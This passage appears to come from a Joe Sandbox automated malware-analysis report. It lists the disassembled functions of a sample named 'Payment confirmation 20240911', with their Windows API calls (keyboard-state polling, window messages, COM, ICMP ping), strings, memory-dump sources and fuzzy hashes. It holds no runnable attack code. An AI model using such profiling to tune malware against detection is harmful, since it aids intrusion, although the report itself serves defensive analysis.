                                          • GetDlgItem.USER32(?,000003E9), ref: 0131FC0A
                                          • GetWindowRect.USER32(00000000,?), ref: 0131FC1B
                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0131FC5E
                                          • GetDlgItem.USER32(?,000003EA), ref: 0131FC6C
                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0131FC89
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0131FC96
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Window$ItemMoveRect$Invalidate
                                          • String ID:
                                          • API String ID: 3096461208-0
                                          • Opcode ID: b8196004a6ef407db15c9e6f1a09af4060791f30c08f40c17b7dc13c813e1cde
                                          • Instruction ID: b4fe657bd6d251749e147dbad41860079de7e4c4e18e46fa5bb784686c94832b
                                          • Opcode Fuzzy Hash: b8196004a6ef407db15c9e6f1a09af4060791f30c08f40c17b7dc13c813e1cde
                                          • Instruction Fuzzy Hash: 04511071B00205AFDF18CFADDD95AAEBBBAFB88314F548129FA16D7294D7709D048B10
                                          Function 01327334 Relevance: 18.1, APIs: 12, Instructions: 113COMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                          • String ID:
                                          • API String ID: 136442275-0
                                          • Opcode ID: 3f4696e658ab9c5069b40298f80fcbf4ffd83a3f1a18ad9293e3ec4abe924942
                                          • Instruction ID: 45afea8025d7714c02460a484750a8c1c741187c99534dda97e14d6caa8db7af
                                          • Opcode Fuzzy Hash: 3f4696e658ab9c5069b40298f80fcbf4ffd83a3f1a18ad9293e3ec4abe924942
                                          • Instruction Fuzzy Hash: DD41F17290012DAADB26EB54CC54EDE73BCBF58314F0041E6E519A2090EB75EBD4CFA4
                                          Function 0134B14A Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 167COMMON
                                          Download Yara Rule
                                          APIs
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0134B204
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: InvalidateRect
                                          • String ID: `"u
                                          • API String ID: 634782764-810275233
                                          • Opcode ID: 2396971077a7b1219d87892fc4040dec13aaefe08e3e839677c56a3412918c27
                                          • Instruction ID: 056ea6422ac35ab2af83d3e331827b773860ec153b00777acd9f8695881a57d6
                                          • Opcode Fuzzy Hash: 2396971077a7b1219d87892fc4040dec13aaefe08e3e839677c56a3412918c27
                                          • Instruction Fuzzy Hash: 9D519330600209BFEF319E6DCC88BAEBFE9AB06368F108515FA55D65B9C771F9508B50
                                          Function 012E84A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                          Download Yara Rule
                                          APIs
                                          • __swprintf.LIBCMT ref: 012E84E5
                                          • __itow.LIBCMT ref: 012E8519
                                            • Part of subcall function 01302177: _xtow@16.LIBCMT ref: 01302198
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: __itow__swprintf_xtow@16
                                          • String ID: %.15g$0x%p$False$True
                                          • API String ID: 1502193981-2263619337
                                          • Opcode ID: 360e72c1ae643b7127d7b52013c9a197922cb1b68e735ad2c6829deef3774251
                                          • Instruction ID: d1d72a562f8a77bb33d60b05472d5e8013202ae8cd4ea52afa56a4fd4d2c893a
                                          • Opcode Fuzzy Hash: 360e72c1ae643b7127d7b52013c9a197922cb1b68e735ad2c6829deef3774251
                                          • Instruction Fuzzy Hash: 6C412676610205DBEB25DF3CD845F6A7BE5FF44308F60446EE58AD6280EA71E641CB10
                                          Function 01349C50 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 105windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                          • String ID: 0$`"u
                                          • API String ID: 176399719-2270789441
                                          • Opcode ID: 38384160e53a8b007ea7d1740e7bc60a63586a2de42389eb249781b15c4af9ea
                                          • Instruction ID: 5fcfa7eb4f467719d608bd0735ffb49e82aa99a9003ba728954f7bb4b19d5b6b
                                          • Opcode Fuzzy Hash: 38384160e53a8b007ea7d1740e7bc60a63586a2de42389eb249781b15c4af9ea
                                          • Instruction Fuzzy Hash: EF417C75A00209EFEB20EFA8D848BDA7BF9FF49318F144058EA9597361D730A910CF60
                                          Function 01305C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 01305CCA
                                            • Part of subcall function 0130889E: __getptd_noexit.LIBCMT ref: 0130889E
                                          • __gmtime64_s.LIBCMT ref: 01305D63
                                          • __gmtime64_s.LIBCMT ref: 01305D99
                                          • __gmtime64_s.LIBCMT ref: 01305DB6
                                          • __allrem.LIBCMT ref: 01305E0C
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01305E28
                                          • __allrem.LIBCMT ref: 01305E3F
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01305E5D
                                          • __allrem.LIBCMT ref: 01305E74
                                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01305E92
                                          • __invoke_watson.LIBCMT ref: 01305F03
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                          • String ID:
                                          • API String ID: 384356119-0
                                          • Opcode ID: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                          • Instruction ID: 92d3c94e3ff004f594907132ca44db61ac3f4c5f956df1319f48fab4cb6e4101
                                          • Opcode Fuzzy Hash: 7915570a7edd34edfe5e16517c98524c56a6d149c47d272a726b9dd24d53d0d8
                                          • Instruction Fuzzy Hash: 3E71D672A01717ABEB16DE6CCC90BAB77E8AF10668F14823AE554D76C1E770D9408F90
                                          Function 013257FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                          Download Yara Rule
                                          APIs
                                          • _memset.LIBCMT ref: 01325816
                                          • GetMenuItemInfoW.USER32 ref: 01325877
                                          • SetMenuItemInfoW.USER32 ref: 013258AD
                                          • Sleep.KERNEL32(000001F4), ref: 013258BF
                                          • GetMenuItemCount.USER32(?), ref: 01325903
                                          • GetMenuItemID.USER32(?,00000000), ref: 0132591F
                                          • GetMenuItemID.USER32(?,-00000001), ref: 01325949
                                          • GetMenuItemID.USER32(?,?), ref: 0132598E
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 013259D4
                                          • GetMenuItemInfoW.USER32 ref: 013259E8
                                          • SetMenuItemInfoW.USER32 ref: 01325A09
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                          • String ID:
                                          • API String ID: 4176008265-0
                                          • Opcode ID: 878d7b92e56215d6448912bb852f3f7a3b941747b0880b8caf2abef232b02193
                                          • Instruction ID: eb8ec3b094696157cfa5cd28352e3d870e65cbc4deb17648b3419ea42da91c5f
                                          • Opcode Fuzzy Hash: 878d7b92e56215d6448912bb852f3f7a3b941747b0880b8caf2abef232b02193
                                          • Instruction Fuzzy Hash: 7C61A171A10269EFEB21EFA8C888AEE7FBCEB0531CF144059E541A7251D771AE05CB21
                                          Function 01323569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                          Download Yara Rule
                                          APIs
                                          • GetKeyboardState.USER32(?), ref: 01323591
                                          • GetAsyncKeyState.USER32 ref: 01323612
                                          • GetKeyState.USER32(000000A0), ref: 0132362D
                                          • GetAsyncKeyState.USER32 ref: 01323647
                                          • GetKeyState.USER32(000000A1), ref: 0132365C
                                          • GetAsyncKeyState.USER32 ref: 01323674
                                          • GetKeyState.USER32(00000011), ref: 01323686
                                          • GetAsyncKeyState.USER32 ref: 0132369E
                                          • GetKeyState.USER32(00000012), ref: 013236B0
                                          • GetAsyncKeyState.USER32 ref: 013236C8
                                          • GetKeyState.USER32(0000005B), ref: 013236DA
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: State$Async$Keyboard
                                          • String ID:
                                          • API String ID: 541375521-0
                                          • Opcode ID: 12e0e8fb5f7bd0a4d0dcae09db19771a8d1affb7592ca096f83f97b84308dd23
                                          • Instruction ID: 6ab53e2467e9e62987a296eadf7afdd04d6df4022dc8df7163f53c51fe54794b
                                          • Opcode Fuzzy Hash: 12e0e8fb5f7bd0a4d0dcae09db19771a8d1affb7592ca096f83f97b84308dd23
                                          • Instruction Fuzzy Hash: E24129306047D9ADFF32676884443B5BEA97B0935CF048049D6C6477C3DBAC91C8CBA6
                                          Function 0131A28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0131A2AA
                                          • SafeArrayAllocData.OLEAUT32(?), ref: 0131A2F5
                                          • VariantInit.OLEAUT32(?), ref: 0131A307
                                          • SafeArrayAccessData.OLEAUT32(?,?), ref: 0131A327
                                          • VariantCopy.OLEAUT32(?,?), ref: 0131A36A
                                          • SafeArrayUnaccessData.OLEAUT32(?,?,?), ref: 0131A37E
                                          • VariantClear.OLEAUT32(?), ref: 0131A393
                                          • SafeArrayDestroyData.OLEAUT32(?), ref: 0131A3A0
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0131A3A9
                                          • VariantClear.OLEAUT32(?), ref: 0131A3BB
                                          • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0131A3C6
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                          • String ID:
                                          • API String ID: 2706829360-0
                                          • Opcode ID: d061a7a24e965d38602658b8caf38e9777cb4262d3a358be769432baf188344e
                                          • Instruction ID: 70cb560e4eb9458e4fbbfd0ef20734b966090963f0bb125bd405f446232ddcb7
                                          • Opcode Fuzzy Hash: d061a7a24e965d38602658b8caf38e9777cb4262d3a358be769432baf188344e
                                          • Instruction Fuzzy Hash: 12412D71A00219AFCB15DFE8D8889EEBFB9FF48345F008465E542B7254DB70AA45CBA0
                                          Function 0133B250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012E84A6: __swprintf.LIBCMT ref: 012E84E5
                                            • Part of subcall function 012E84A6: __itow.LIBCMT ref: 012E8519
                                          • CoInitialize.OLE32 ref: 0133B298
                                          • CoUninitialize.OLE32 ref: 0133B2A3
                                          • CoCreateInstance.OLE32(?,00000000,00000017,0136D8FC,?), ref: 0133B303
                                          • IIDFromString.OLE32(?,?), ref: 0133B376
                                          • VariantInit.OLEAUT32(?), ref: 0133B410
                                          • VariantClear.OLEAUT32(?), ref: 0133B471
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                          • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                          • API String ID: 834269672-1287834457
                                          • Opcode ID: 61753009598a2dac7f91d7c96857a9a5e43c77ee6336819b9e3e78ef41dd6339
                                          • Instruction ID: 0d4bd453eb6a9bf5463ce15ea5897b8b7a021423f65b5df902f8d9c246ebca76
                                          • Opcode Fuzzy Hash: 61753009598a2dac7f91d7c96857a9a5e43c77ee6336819b9e3e78ef41dd6339
                                          • Instruction Fuzzy Hash: 86618B31204312AFD711DF58C888B6EFBE8EF88768F04451DF9899B294D770E944CB9A
                                          Function 01338694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                          Download Yara Rule
                                          APIs
                                          • WSAStartup.WSOCK32(00000101,?), ref: 013386F5
                                          • inet_addr.WSOCK32(?,?,?), ref: 0133873A
                                          • gethostbyname.WSOCK32(?), ref: 01338746
                                          • IcmpCreateFile.IPHLPAPI ref: 01338754
                                          • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 013387C4
                                          • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 013387DA
                                          • IcmpCloseHandle.IPHLPAPI(00000000), ref: 0133884F
                                          • WSACleanup.WSOCK32 ref: 01338855
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                          • String ID: Ping
                                          • API String ID: 1028309954-2246546115
                                          • Opcode ID: c1172caebcdcf2fde1e7541a4a8c6adae667aeaa17d21909315e9ed363affc76
                                          • Instruction ID: eb129fba92af1c9e6c4b109f253208f8b4f1d4b052eaf98d5fa19d659510549b
                                          • Opcode Fuzzy Hash: c1172caebcdcf2fde1e7541a4a8c6adae667aeaa17d21909315e9ed363affc76
                                          • Instruction Fuzzy Hash: 3B51A931604301DFD721DF64DD48B2ABBE4EF88718F048569F696DB2A0DB74E801CB46
                                          Function 0134EAA6 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 149windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                            • Part of subcall function 012FB736: GetCursorPos.USER32(000000FF), ref: 012FB749
                                            • Part of subcall function 012FB736: ScreenToClient.USER32(00000000,000000FF), ref: 012FB766
                                            • Part of subcall function 012FB736: GetAsyncKeyState.USER32 ref: 012FB78B
                                            • Part of subcall function 012FB736: GetAsyncKeyState.USER32 ref: 012FB799
                                          • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0134EB0E
                                          • ImageList_EndDrag.COMCTL32 ref: 0134EB14
                                          • ReleaseCapture.USER32 ref: 0134EB1A
                                          • SetWindowTextW.USER32(?,00000000,?,?,00000000,?,00000000), ref: 0134EBC2
                                          • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0134EBD5
                                          • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0134ECAE
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                          • String ID: @GUI_DRAGFILE$@GUI_DROPID$`"u
                                          • API String ID: 1924731296-1507146671
                                          • Opcode ID: 55e0035aa18c9005e1dc42c29a2545447bab2c31e8fc807c2f1a5aa9d157959e
                                          • Instruction ID: c29a087a3cf4e004fba4e6418d99d2f9e9c423ab18854b4d9cf3cdffe47fbea3
                                          • Opcode Fuzzy Hash: 55e0035aa18c9005e1dc42c29a2545447bab2c31e8fc807c2f1a5aa9d157959e
                                          • Instruction Fuzzy Hash: 8C51CE35214304AFD714EF64C859F6A7BE9FF88708F404A2CF685972E1CB74A904CB52
                                          Function 0132EC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • SetErrorMode.KERNEL32(00000001), ref: 0132EC1E
                                          • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0132EC94
                                          • GetLastError.KERNEL32 ref: 0132EC9E
                                          • SetErrorMode.KERNEL32(00000000,READY), ref: 0132ED0B
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Error$Mode$DiskFreeLastSpace
                                          • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                          • API String ID: 4194297153-14809454
                                          • Opcode ID: fe50cd25b83b3b9f9bf976383324ac1f95d68c97f20ca9dca1efdf491b47eb2a
                                          • Instruction ID: 401c888eefe8793ca131179711cd5be33a3cd6e4cc067803b57c3ee2545f6ce4
                                          • Opcode Fuzzy Hash: fe50cd25b83b3b9f9bf976383324ac1f95d68c97f20ca9dca1efdf491b47eb2a
                                          • Instruction Fuzzy Hash: 3A31A135A002299FDF11FFE9C94AABABBB8FF54708F148029E506D7391DA719941CB80
                                          Function 0131C6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 0131C782
                                          • GetDlgCtrlID.USER32 ref: 0131C78D
                                          • GetParent.USER32 ref: 0131C7A9
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0131C7AC
                                          • GetDlgCtrlID.USER32 ref: 0131C7B5
                                          • GetParent.USER32(?), ref: 0131C7D1
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0131C7D4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$CtrlParent$_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 313823418-1403004172
                                          • Opcode ID: 35fe77ad55add29e0cd9cdf1647315402310a42985757e17288760e78e09fb85
                                          • Instruction ID: 098ce5babd5bcb6837df9b58b6f300b8c3354ed66d3ed0ea18f4986f9ddbe1de
                                          • Opcode Fuzzy Hash: 35fe77ad55add29e0cd9cdf1647315402310a42985757e17288760e78e09fb85
                                          • Instruction Fuzzy Hash: D721C474A40208BFDF05EBA4CC94DBE7BA9EF56314F504115E552932E4DBB45825DB20
                                          Function 0131C7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 012ECAEE: _memmove.LIBCMT ref: 012ECB2F
                                          • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 0131C869
                                          • GetDlgCtrlID.USER32 ref: 0131C874
                                          • GetParent.USER32 ref: 0131C890
                                          • SendMessageW.USER32(00000000,?,00000111,?), ref: 0131C893
                                          • GetDlgCtrlID.USER32 ref: 0131C89C
                                          • GetParent.USER32(?), ref: 0131C8B8
                                          • SendMessageW.USER32(00000000,?,?,00000111), ref: 0131C8BB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
                                          • Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmpDownload File
